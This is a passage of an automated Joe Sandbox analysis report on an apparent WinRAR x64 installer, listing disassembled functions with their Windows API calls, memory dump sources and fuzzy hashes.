Instruction Fuzzy Hash: B9317272A09B818AEB608F64E8817ED7374FB95759F444039DACD97B88DF38C648C710

Function 00007FF6C3BBFEC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6C3BBFF41
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6C3BBFF59
RtlVirtualUnwind.KERNEL32 ref: 00007FF6C3BBFF94
IsDebuggerPresent.KERNEL32 ref: 00007FF6C3BBFFCD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6C3BBFFD7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6C3BBFFE2

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 6dc7126bae958aafbb62ae645c9ce5dc0c359ef71b5fef61e852479692239a18
Instruction ID: d3c66fead0d4b3b6e36bd0bc9da8890bf3001e54fb86130c6e4d8551de368a33
Opcode Fuzzy Hash: 6dc7126bae958aafbb62ae645c9ce5dc0c359ef71b5fef61e852479692239a18
Instruction Fuzzy Hash: 0A319636608F8186DB64CF29E8816AE73A4FB9A759F500135EACD97B59DF3CC245CB00

Function 00007FF6C3BA1F08 Relevance: 7.6, APIs: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF6C3BA1F53
FindFirstFileW.KERNEL32 ref: 00007FF6C3BA1F94
GetLastError.KERNEL32 ref: 00007FF6C3BA1FAD
FindNextFileW.KERNEL32 ref: 00007FF6C3BA1FD6
GetLastError.KERNEL32 ref: 00007FF6C3BA1FE4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: be01675985a9e4af430eb1eacd21b50adc1fe5c5a8316179733ceb51338fdfde
Instruction ID: 71959295ce1d1ac493213edc1a87c8d5b5f3b57174743f882f41da6655e085a8
Opcode Fuzzy Hash: be01675985a9e4af430eb1eacd21b50adc1fe5c5a8316179733ceb51338fdfde
Instruction Fuzzy Hash: 0C419222A08A4196DA60DF25E4526B97360FFA67B6F400331E7ED97AD6DF2CE518C700

Function 00007FF6C3BCCB10 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6C3BCCB76
memcpy_s.LIBCPMT ref: 00007FF6C3BCCBA1

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: ccd011f23cb7e5654ec22ef562e2b0126fd7ca5cc9ef70175b0a1773cec1ee92
Instruction ID: 9380c3383e88b072e2f1a4e7c374f74d2c4b812f7198ce0e185aa4067cb5e76d
Opcode Fuzzy Hash: ccd011f23cb7e5654ec22ef562e2b0126fd7ca5cc9ef70175b0a1773cec1ee92
Instruction Fuzzy Hash: F8C1E372A1828687DB34AF19B045A6AB791F7A5B85F448134DBCA93784DF3CF806CB40

Function 00007FF6C3B9BA38 Relevance: 4.5, APIs: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF6C3B9BAD6), ref: 00007FF6C3B9BA45
FormatMessageW.KERNEL32 ref: 00007FF6C3B9BA7A
LocalFree.KERNEL32 ref: 00007FF6C3B9BA96

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: 0665922bf7abb45023e2b7dded8e0ad702c130e5ea755ad4085e22d7d74e611b
Instruction ID: 3f2e61f4ccc2583f454df62fc7a48e481e1f2e7bb08bd0d7b4851bed97996236
Opcode Fuzzy Hash: 0665922bf7abb45023e2b7dded8e0ad702c130e5ea755ad4085e22d7d74e611b
Instruction Fuzzy Hash: A6F06262A2C74283F710DF51F455B3AA3A1FBA6B92F044034DACED6A88DF7CD0148B14

Function 00007FF6C3BD1518 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6C3BD1767
RaiseException.KERNEL32 ref: 00007FF6C3BD1778

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 9f2f120d3ecb95be0da68e540d64d61f85f31db099565da766693d65c9a44c61
Instruction ID: e68841212af3ecf737ed32c889cf88f27ab92b6f69f4d8d701e06d9fbca25ff7
Opcode Fuzzy Hash: 9f2f120d3ecb95be0da68e540d64d61f85f31db099565da766693d65c9a44c61
Instruction Fuzzy Hash: F0B15A77A04B898BEB55CF29C8467683BE0F785B89F188921DB9D837A8CF39D451C740

Function 00007FF6C3BC35D4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6C3BC3984
, xrefs: 00007FF6C3BC3742

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: d9b61ac85c199ae343cad72166c8023041029ab95baf6ee6999918e89ee9266a
Instruction ID: 87f717acd35881b8769ef489e6681d921abdea5b188498fea4a40d1177c6599a
Opcode Fuzzy Hash: d9b61ac85c199ae343cad72166c8023041029ab95baf6ee6999918e89ee9266a
Instruction Fuzzy Hash: 5AE10972A0864281E778AF25A04293D7360FF67B4AF944135CACEA3794DF3DE851CB40

Function 00007FF6C3BC7D40 Relevance: 2.6, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

Strings

gfff, xrefs: 00007FF6C3BC7ECA
e+000, xrefs: 00007FF6C3BC7E4D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: a16caab20146e5fad907b32f0584b0b2d47f79384eaef0e96097227fb797859a
Instruction ID: 3b3f60e5cc0c35d7aa201717b96f1d695ad4abd54ef4c9954569733ef26c1066
Opcode Fuzzy Hash: a16caab20146e5fad907b32f0584b0b2d47f79384eaef0e96097227fb797859a
Instruction Fuzzy Hash: 3F515A63B182C64AE7359E35A843B696B95E766B94F488231CBE89BAC1CF3DD444C700

Function 00007FF6C3B9DE98 Relevance: 2.1, Strings: 1, Instructions: 895COMMON

Download Yara Rule

Strings

__tmp_reference_source_, xrefs: 00007FF6C3B9E16A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: __tmp_reference_source_
API String ID: 0-685763994
Opcode ID: 070bd5b6dae42b3918be0c4dbfb9d73da2874f0bd48589af32e490f6267ff18c
Instruction ID: b703d050d2e4d90f0640f49ea2678f7f50957b53930e058b106303ca41d8e105
Opcode Fuzzy Hash: 070bd5b6dae42b3918be0c4dbfb9d73da2874f0bd48589af32e490f6267ff18c
Instruction Fuzzy Hash: 94929662A0C7C255EA64DF20A052BFE6771EF77786F450032EACDA7696CE2CE544C700

Function 00007FF6C3B94778 Relevance: 2.0, Strings: 1, Instructions: 731COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF6C3B94F8B

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: afb98630274028142abf6caa83fbeda3c92ca76f05d6b90c83e7cde3ee236113
Instruction ID: eb90eb83aed6d722fd8679dc120b76ed98079e0043a12bb52cf6badcf1b4779c
Opcode Fuzzy Hash: afb98630274028142abf6caa83fbeda3c92ca76f05d6b90c83e7cde3ee236113
Instruction Fuzzy Hash: 4E62E472A0868296EB18DF21D552AFDB7B0FB72389F404036DACE97692CF6CE555C700

Function 00007FF6C3BC9B40 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016aea9cb5d30b5c4296439d1fc9fcb46297b93a152b531f0f11addf29a5bb9b
Instruction ID: 90472fd3d42ab269201130d52378261ce8fd521ddf994e17bf9d5f082a75c715
Opcode Fuzzy Hash: 016aea9cb5d30b5c4296439d1fc9fcb46297b93a152b531f0f11addf29a5bb9b
Instruction Fuzzy Hash: DF51D522B0478185FB20AF76B8419AE7BA5EB62795F144135EEDDB7A95CE3CD401CB00

Function 00007FF6C3BA2A74 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF6C3BA2AA5

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: e0d99b8297f000d9ffca3a48de9c3b28b0bd23b3cf44fa6e4559927efa6291ea
Instruction ID: 6c9dd3c4e4ef4e0c9f58c858e58470d4c73e26a528b4c7f2a160d062eebb29f5
Opcode Fuzzy Hash: e0d99b8297f000d9ffca3a48de9c3b28b0bd23b3cf44fa6e4559927efa6291ea
Instruction Fuzzy Hash: F9014C79D09A428BE624CF04E842B7A73A1FBAA356F501134E5CDAAB94CF3CE5018F40

Function 00007FF6C3BB2954 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6C3BB2981

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2d32fba226446cf735b3efa7e389aea2716db7426c436d2914a0ba6405b8d279
Instruction ID: 1c23726e9c4b443d952dc447247b9f681da438410ba890f7c5472504de7e6235
Opcode Fuzzy Hash: 2d32fba226446cf735b3efa7e389aea2716db7426c436d2914a0ba6405b8d279
Instruction Fuzzy Hash: C3E04F71A1868286E7709B00F453BB97360FB99745F800031DACC57B85DF3CD119CE40

Function 00007FF6C3BC78AC Relevance: 1.5, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6C3BC7BEE

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: 94604325bb74c132b3677955763b418003b5be94bd3e1b621f9fe3a9a961bc1b
Instruction ID: 68efe645b27894bda0699bb1e79d5199cc308bff595e9d103d991cc5bbdb890c
Opcode Fuzzy Hash: 94604325bb74c132b3677955763b418003b5be94bd3e1b621f9fe3a9a961bc1b
Instruction Fuzzy Hash: B3A14662B087868AEB31DF29B412BAA7B91EB62785F049131DECD97781DF3DD501C701

Function 00007FF6C3BCB630 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6C3BCB634

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f19df3457cabf08339b26dd724f0c9893481a6ac0a987c3003da21f85d52f0fa
Instruction ID: da9a1ebaad0f51a0eebf9df46e31cb23774172a29c85af98065045b457c66855
Opcode Fuzzy Hash: f19df3457cabf08339b26dd724f0c9893481a6ac0a987c3003da21f85d52f0fa
Instruction Fuzzy Hash: 75B09220E07F02C6EA4C2F596C87A5433A86F69B12F990078C0CCA1320DE3C21E95B00

Function 00007FF6C3B97754 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1ffa1b6c97f9c4a1893d4c9730c4ad96705deaad2342df1725a2128c8e5303
Instruction ID: f35252e6bf036e0f66d60841b99431bb0edf04c7063dee740cd0a29ce10ffa3c
Opcode Fuzzy Hash: 9c1ffa1b6c97f9c4a1893d4c9730c4ad96705deaad2342df1725a2128c8e5303
Instruction Fuzzy Hash: 07627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF6C3BA8978 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb2ce0b07b00d60622ba1d133584415865426598a4840553b895c569aa2730a
Instruction ID: edc98953e1cf79d0e36ef7fde55a1a0d3d0115c9f443bf7c4da0ddfe426c0ed9
Opcode Fuzzy Hash: 2eb2ce0b07b00d60622ba1d133584415865426598a4840553b895c569aa2730a
Instruction Fuzzy Hash: DA22E2B3B246508BD728CF25C89AE5E3766F799344B4B8228DF4ACB785DB38D505CB40

Function 00007FF6C3BC31D0 Relevance: .3, Instructions: 327COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce01dcdfbdad5a378132bd8dff2501772a90bb84c1e186c249de49aa357e036
Instruction ID: 5d0409c87fbe6b6635074cb4bfc1e3e3ee33d2d5dd67bf7ada28aca115985a82
Opcode Fuzzy Hash: 3ce01dcdfbdad5a378132bd8dff2501772a90bb84c1e186c249de49aa357e036
Instruction Fuzzy Hash: 94D10B22E0860286EB79AE25A042A7D33A0FF67B49F944235CECDA76D5CF3DD545C740

Function 00007FF6C3BAD3C0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc06679176bc06476069d97717d8ee30100b2b3ed581e9c191031c280ee88603
Instruction ID: 68d25f7f75f77a9d032adf034da3d187e2a81bf6c7704ddd1962aa24b888ebc4
Opcode Fuzzy Hash: dc06679176bc06476069d97717d8ee30100b2b3ed581e9c191031c280ee88603
Instruction Fuzzy Hash: 41D1F562A08A818AFB60DF29D05ABAD7791FB6674DF044139DBCDA7685DF3CE540C700

Function 00007FF6C3B98BE0 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11c3cfc7f864254b051c5df1df81e9b4045b7f6a323e9653ed5c3f6f5cf2c0b
Instruction ID: 3ed87b3aca15bb01f24b8cc18389fec03cc3c9858bf1069a39de64c2c188dfd2
Opcode Fuzzy Hash: f11c3cfc7f864254b051c5df1df81e9b4045b7f6a323e9653ed5c3f6f5cf2c0b
Instruction Fuzzy Hash: 3ED19B77B282908FE350CFBAD401AAD3BB1F39878CB519125DE99A7F09D638E505CB40

Function 00007FF6C3BC2840 Relevance: .2, Instructions: 241COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
